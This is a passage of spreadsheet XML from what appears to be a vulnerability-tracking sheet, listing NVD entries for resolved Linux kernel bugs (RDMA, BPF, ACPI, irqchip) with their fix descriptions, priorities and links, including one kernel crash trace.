      <c r="F841" s="5" t="inlineStr"/>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="inlineStr"/>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr"/>
      <c r="L841" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q841" s="5" t="inlineStr"/>
      <c r="R841" s="5" t="inlineStr"/>
      <c r="S841" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix use after free in ib_query_qp()
When querying a QP via the netlink flow the only synchronization
mechanism for the said QP is rdma_restrack_get(), meanwhile during the
QP destroy path rdma_restrack_del() is called at the end of the
ib_destroy_qp_user() function which is too late, since by then the
vendor specific resources for said QP would already be destroyed, and
till the rdma_restrack_del() is called this QP can still be accessed,
which could cause the use after free below.
Fix this by moving the rdma_restrack_begin_del() to the start of the
ib_destroy_qp_user(), which in turn waits for all usages of the QP to be
done then removes it from the database to prevent access to it while it
is being destroyed.
RIP: 0010:ib_query_qp+0x15/0x50 [ib_core]
Code: 48 83 05 5d 8e b9 ff 01 eb b5 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 c7 46 40 00 00 00 00 48 c7 46 78 00 00 00 00 &lt;48&gt; 8b 07 48 8b 80 88 01 00 00 48 85 c0 74 1a 48 83 05 54 91 b9 ff
RSP: 0018:ff11000108a8f2f0 EFLAGS: 00010202
RAX: 0000000000000000 RBX: ff11000108a8f370 RCX: ff11000108a8f370
RDX: 0000000000000000 RSI: ff11000108a8f3d8 RDI: 0000000000000000
RBP: ff1100010de5a000 R08: 0000000000000e80 R09: 0000000000000004
R10: ff110001057a604c R11: 0000000000000000 R12: ff11000108a8f370
R13: ff110001090e8000 R14: 0000000000000000 R15: ff110001057a602c
FS:  00007f2ffd8db6c0(0000) GS:ff110008dc90b000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 000000010b9a7004 CR4: 0000000000373eb0
Call Trace:
 &lt;TASK&gt;
 mlx5_ib_gsi_query_qp+0x21/0x50 [mlx5_ib]
 mlx5_ib_query_qp+0x689/0x9d0 [mlx5_ib]
 ib_query_qp+0x35/0x50 [ib_core]
 fill_res_qp_entry_query.isra.0+0x47/0x280 [ib_core]
 ? __wake_up+0x40/0x50
 ? netlink_broadcast_filtered+0x15a/0x550
 ? kobject_uevent_env+0x562/0x710
 ? ep_poll_callback+0x242/0x270
 ? __nla_put+0xc/0x20
 ? nla_put+0x28/0x40
 ? nla_put_string+0x2e/0x40 [ib_core]
 fill_res_qp_entry+0x138/0x190 [ib_core]
 res_get_common_dumpit+0x4a5/0x800 [ib_core]
 ? fill_res_qp_entry_query.isra.0+0x280/0x280 [ib_core]
 nldev_res_get_qp_dumpit+0x1e/0x30 [ib_core]
 netlink_dump+0x16f/0x450
 __netlink_dump_start+0x1ce/0x2e0
 rdma_nl_rcv_msg+0x1d3/0x330 [ib_core]
 ? nldev_res_get_qp_raw_dumpit+0x30/0x30 [ib_core]
 rdma_nl_rcv_skb.constprop.0.isra.0+0x108/0x180 [ib_core]
 rdma_nl_rcv+0x12/0x20 [ib_core]
 netlink_unicast+0x255/0x380
 ? __alloc_skb+0xfa/0x1e0
 netlink_sendmsg+0x1f3/0x420
 __sock_sendmsg+0x38/0x60
 ____sys_sendmsg+0x1e8/0x230
 ? copy_msghdr_from_user+0xea/0x170
 ___sys_sendmsg+0x7c/0xb0
 ? __futex_wait+0x95/0xf0
 ? __futex_wake_mark+0x40/0x40
 ? futex_wait+0x67/0x100
 ? futex_wake+0xac/0x1b0
 __sys_sendmsg+0x5f/0xb0
 do_syscall_64+0x55/0xb90
 entry_SYSCALL_64_after_hwframe+0x4b/0x53</t>
        </is>
      </c>
      <c r="T841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92512</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92513</t>
        </is>
      </c>
      <c r="D842" s="5" t="inlineStr"/>
      <c r="E842" s="5" t="inlineStr"/>
      <c r="F842" s="5" t="inlineStr"/>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="inlineStr"/>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr"/>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q842" s="5" t="inlineStr"/>
      <c r="R842" s="5" t="inlineStr"/>
      <c r="S842" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mana_ib: drain QP references after partial table insertion
mana_table_store_ud_qp() publishes a QP at its send-queue id before
inserting the receive-queue id, dropping the XArray lock between the two
xa_insert_irq() calls. A concurrent completion handler can look up the QP
and take a transient reference. When the second insertion fails, the
rollback erased only the send-queue entry and returned, leaving both the
initial table reference and the transient reference outstanding while RDMA
core frees the QP, causing a use-after-free.
Drain the reference as normal destruction does: drop the initial reference
and wait for qp-&gt;free, releasing the QP only after every concurrent lookup
returns its reference.</t>
        </is>
      </c>
      <c r="T842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92513</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92514</t>
        </is>
      </c>
      <c r="D843" s="5" t="inlineStr"/>
      <c r="E843" s="5" t="inlineStr"/>
      <c r="F843" s="5" t="inlineStr"/>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="inlineStr"/>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr"/>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P843" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q843" s="5" t="inlineStr"/>
      <c r="R843" s="5" t="inlineStr"/>
      <c r="S843" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: Fix CEQ tasklet use-after-free on removal
Each CEQ interrupt handler only schedules eqc-&gt;tasklet. The tasklet calls
erdma_ceq_completion_handler(), which reads the DMA-coherent EQ ring
through get_next_valid_eqe() and updates eq-&gt;dbrec through notify_eq().
erdma_ceqs_uninit() frees each CEQ IRQ and then destroys its EQ.
free_irq() prevents another hard IRQ and waits for an in-flight handler,
but it does not drain a tasklet that the handler already scheduled. The
tasklet can therefore access eq-&gt;qbuf or eq-&gt;dbrec after
erdma_eq_destroy() frees them.
Clearing ceq_cb-&gt;ready does not synchronize with a tasklet that already
passed the check at the start of erdma_ceq_completion_handler().
Kill the tasklet after free_irq(), when no handler can schedule it again,
and before erdma_ceq_uninit_one() releases the EQ buffers.</t>
        </is>
      </c>
      <c r="T843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92514</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92515</t>
        </is>
      </c>
      <c r="D844" s="5" t="inlineStr"/>
      <c r="E844" s="5" t="inlineStr"/>
      <c r="F844" s="5" t="inlineStr"/>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="inlineStr"/>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q844" s="5" t="inlineStr"/>
      <c r="R844" s="5" t="inlineStr"/>
      <c r="S844" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Preserve unique-field state across nested structs
btf_find_struct_field() initializes a fresh seen mask for every recursive
descent. Unique special fields in different levels of the same aggregate
therefore do not see one another. The duplicate fields can reach
btf_parse_fields(), where they trigger an invariant WARN_ON_ONCE(). A
crafted user BTF can consequently trigger the warning before map creation
checks capabilities.
Initialize the seen mask once in btf_find_field() and pass the same pointer
through struct, datasec, and nested-struct walks. This gives the entire field
traversal one shared uniqueness state.</t>
        </is>
      </c>
      <c r="T844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92515</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92516</t>
        </is>
      </c>
      <c r="D845" s="5" t="inlineStr"/>
      <c r="E845" s="5" t="inlineStr"/>
      <c r="F845" s="5" t="inlineStr"/>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="inlineStr"/>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr"/>
      <c r="L845" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q845" s="5" t="inlineStr"/>
      <c r="R845" s="5" t="inlineStr"/>
      <c r="S845" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix offset warn check for bpf_res_spin_lock
Sashiko pointed out correctly that the case statement for
BPF_RES_SPIN_LOCK incorrectly checks offset for BPF_SPIN_LOCK.
Fix it by checking res_spin_lock_off instead.</t>
        </is>
      </c>
      <c r="T845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92516</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92517</t>
        </is>
      </c>
      <c r="D846" s="5" t="inlineStr"/>
      <c r="E846" s="5" t="inlineStr"/>
      <c r="F846" s="5" t="inlineStr"/>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="inlineStr"/>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr"/>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q846" s="5" t="inlineStr"/>
      <c r="R846" s="5" t="inlineStr"/>
      <c r="S846" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, riscv: Fix extable handling for arena load_acquire
emit_atomic_ld_st() returns 1 to have build_body() skip the zext after
a sub-word load_acquire. The caller does "ret = ret ?:
add_exception_handler(...)", which skips add_exception_handler() on any
non-zero ret, so the extable entry is missing and a faulting
PROBE_ATOMIC load_acquire oopses.
REG_DONT_CLEAR_MARKER leaves rd stale on fault, and the verifier still
thinks the load overwrote it, so a program can leak it through a map.
Check ret &gt;= 0 before calling add_exception_handler(), and pass rd for
LOAD_ACQ so the fault zeroes rd like a PROBE_MEM load. Return ret
unchanged for the zext skip.</t>
        </is>
      </c>
      <c r="T846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92517</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92518</t>
        </is>
      </c>
      <c r="D847" s="5" t="inlineStr"/>
      <c r="E847" s="5" t="inlineStr"/>
      <c r="F847" s="5" t="inlineStr"/>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="inlineStr"/>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q847" s="5" t="inlineStr"/>
      <c r="R847" s="5" t="inlineStr"/>
      <c r="S847" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
riscv, bpf: Fix kernel stack corruption in tailcall with CFI
When CONFIG_CFI_CLANG is enabled, prog-&gt;bpf_func already skips the kcfi
instruction during setup. Including it again in the tailcall jump offset
causes it to jump over an extra 4 bytes, skipping the stack pointer
adjustment, which will result in kernel stack corruption.</t>
        </is>
      </c>
      <c r="T847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92518</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92519</t>
        </is>
      </c>
      <c r="D848" s="5" t="inlineStr"/>
      <c r="E848" s="5" t="inlineStr"/>
      <c r="F848" s="5" t="inlineStr"/>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="inlineStr"/>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr"/>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q848" s="5" t="inlineStr"/>
      <c r="R848" s="5" t="inlineStr"/>
      <c r="S848" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
riscv, bpf: Fix memory leak in bpf_jit_free
When bpf_int_jit_compile() is called for subprograms, it returns early
during the first pass (!prog-&gt;is_func || extra_pass is false), keeping
ctx-&gt;offset alive for the subsequent extra pass.
If JIT compilation fails for a later subprogram, the BPF core aborts
and calls bpf_jit_free() to clean up the first subprogram. However,
bpf_jit_free() fails to free jit_data-&gt;ctx.offset, which causes a
memory leak of the JIT context offsets array.
Fix this by adding the missing kfree(jit_data-&gt;ctx.offset) in
bpf_jit_free().</t>
        </is>
      </c>
      <c r="T848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92519</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92520</t>
        </is>
      </c>
      <c r="D849" s="5" t="inlineStr"/>
      <c r="E849" s="5" t="inlineStr"/>
      <c r="F849" s="5" t="inlineStr"/>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="inlineStr"/>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr"/>
      <c r="K849" s="5" t="inlineStr"/>
      <c r="L849" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q849" s="5" t="inlineStr"/>
      <c r="R849" s="5" t="inlineStr"/>
      <c r="S849" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Zero queue and stack outputs on lock failure
Queue and stack pop/peek helpers accept an uninitialized output buffer
because the verifier expects the helper to initialize it. The empty-map
error path clears the buffer, but a failed lock acquisition returns
-EBUSY without writing it.
Clear the output before returning -EBUSY so BPF programs cannot observe
uninitialized stack contents after a failed helper call.</t>
        </is>
      </c>
      <c r="T849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92520</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92521</t>
        </is>
      </c>
      <c r="D850" s="5" t="inlineStr"/>
      <c r="E850" s="5" t="inlineStr"/>
      <c r="F850" s="5" t="inlineStr"/>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="inlineStr"/>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr"/>
      <c r="L850" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q850" s="5" t="inlineStr"/>
      <c r="R850" s="5" t="inlineStr"/>
      <c r="S850" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: PCI: Clear driver_data on all paths that free the acpi_pci_root
acpi_pci_root_add() assigns the freshly allocated root to
device-&gt;driver_data before dmar_device_add() and pci_acpi_scan_root().
Both failure paths reach the end: label where root is kfree()'d, but
only the pci_acpi_scan_root() path clears driver_data first.
When dmar_device_add() fails during a hot-add, root is freed while
device-&gt;driver_data still points at it.  The ACPI core does not clear
driver_data on attach failure, so a later acpi_pci_find_root() call may
dereference this dangling pointer.
acpi_pci_root_remove() has the same problem: it frees root without
clearing device-&gt;driver_data, leaving a dangling pointer behind after
the root bridge is removed.
Move the NULL assignment to the shared end: label so every error path in
acpi_pci_root_add() clears driver_data before freeing root, and clear it
in acpi_pci_root_remove() as well, so the object is never left reachable
through driver_data after being freed.</t>
        </is>
      </c>
      <c r="T850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92521</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92522</t>
        </is>
      </c>
      <c r="D851" s="5" t="inlineStr"/>
      <c r="E851" s="5" t="inlineStr"/>
      <c r="F851" s="5" t="inlineStr"/>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="inlineStr"/>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q851" s="5" t="inlineStr"/>
      <c r="R851" s="5" t="inlineStr"/>
      <c r="S851" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: processor: validate MADT IOAPIC entry bounds
The IOAPIC hotplug lookup parses both MADT and _MAT records directly.
The MADT walk previously used a subtable's declared length to advance
the cursor after only locating a generic header.  The _MAT path likewise
passed a generic header to the IOAPIC helper.
Validate that a current record has a complete generic header, that its
declared length is contained in the available record range, and that a
typed IOAPIC record contains the full fixed IOAPIC body before reading
its fields.  Use the same relation for both MADT and _MAT provider
paths.</t>
        </is>
      </c>
      <c r="T851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92522</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92523</t>
        </is>
      </c>
      <c r="D852" s="5" t="inlineStr"/>
      <c r="E852" s="5" t="inlineStr"/>
      <c r="F852" s="5" t="inlineStr"/>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="inlineStr"/>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr"/>
      <c r="L852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q852" s="5" t="inlineStr"/>
      <c r="R852" s="5" t="inlineStr"/>
      <c r="S852" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/nldev: validate dynamic counter attribute length
RDMA_NLDEV_ATTR_STAT_HWCOUNTERS is a nested attribute whose children are
consumed directly with nla_get_u32(). The top-level policy validates only
the container, so it does not establish the fixed shape of each child.
Require every child payload to be exactly one u32 before reading it.</t>
        </is>
      </c>
      <c r="T852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92523</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92524</t>
        </is>
      </c>
      <c r="D853" s="5" t="inlineStr"/>
      <c r="E853" s="5" t="inlineStr"/>
      <c r="F853" s="5" t="inlineStr"/>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="inlineStr"/>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr"/>
      <c r="L853" s="5" t="inlineStr"/>
      <c r="M853" s="5" t="inlineStr"/>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P853" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q853" s="5" t="inlineStr"/>
      <c r="R853" s="5" t="inlineStr"/>
      <c r="S853" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/gic-v3-its: Prevent leak in its_vpe_irq_domain_alloc()
When its_irq_gic_domain_alloc() fails, the following
its_vpe_irq_domain_free() fails to invoke its_vep_teardown() for the
corresponding interrupt, which leaks the resource.
Invoke its_vpe_teardown() in the error handling path to avoid the leak.
[ tglx: Massaged change log ]</t>
        </is>
      </c>
      <c r="T853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92524</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92525</t>
        </is>
      </c>
      <c r="D854" s="5" t="inlineStr"/>
      <c r="E854" s="5" t="inlineStr"/>
      <c r="F854" s="5" t="inlineStr"/>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="inlineStr"/>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr"/>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q854" s="5" t="inlineStr"/>
      <c r="R854" s="5" t="inlineStr"/>
      <c r="S854" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/rxe: Validate num_sge/cur_sge before indexing wqe-&gt;dma.sge[]
For a user QP, qp-&gt;sq.queue is a ring the application writes directly,
so rxe_post_send() takes the is_user branch and only schedules send_task
without validating the WQE. rxe_requester() consumes it in place via
req_next_wqe() and calls copy_data(), which indexes
&amp;wqe-&gt;dma.sge[cur_sge] with the attacker-controlled num_sge/cur_sge.
Only the kernel path bounds num_sge (validate_send_wr()); the user WQE
is never checked, so a local unprivileged user can post a WQE with an
out-of-range cur_sge or oversized num_sge and force an out-of-bounds
read of the per-WQE sge array in copy_data() (vmalloc OOB read, local
DoS).
Bound num_sge to qp-&gt;sq.max_sge in rxe_requester() before use, the way
get_srq_wqe() already guards SRQ entries, and bound cur_sge only when
the WQE carries payload (dma.resid): copy_data() returns early on a
zero-length copy before touching dma-&gt;sge[], so a zero-payload WQE --
the only kind a max_sge == 0 QP can post -- stays valid.
Reproduced under KASAN; the vmalloc-out-of-bounds in copy_data() is gone.</t>
        </is>
      </c>
      <c r="T854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92525</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93037</t>
        </is>
      </c>
      <c r="D855" s="5" t="inlineStr"/>
      <c r="E855" s="5" t="inlineStr"/>
      <c r="F855" s="5" t="inlineStr"/>
